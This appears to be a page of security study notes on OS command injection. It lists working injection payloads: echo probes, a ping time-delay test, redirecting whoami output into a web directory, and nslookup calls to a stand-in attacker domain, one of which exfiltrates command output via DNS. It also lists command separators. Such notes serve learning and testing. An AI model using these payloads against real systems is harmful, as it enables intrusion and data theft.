OS command injection

Whenever a web app calls out to OS commands (e.g. via a pearl script), malicious commands may be injected. This can potentially lead to a full compromise of the system.

Executing arbitrary commands

param=& echo test &
param=1|echo test

Blind command injections

Detecting vulnerabilities using time delays

& ping -c 10 127.0.0.1 &

Exploiting vulnerabilities by redirecting output

& whoami > /var/www/static/whoami.txt &

Exploiting vulnerabilities using out-of-band (OAST) techniques

& nslookup kgji2ohoyw.web-attacker.com &

Exfiltrate data

& nslookup `whoami`.kgji2ohoyw.web-attacker.com &

Ways of injection

Command separators

Windows and Unix:

  • &

  • &&

  • |

  • ||

Unix only:

  • ;

  • Newline: 0x0a or

  • Backticks: `command`

  • Dollar character: $(command)

PreviousLogic flawsNextHTTP Request smuggling

Last updated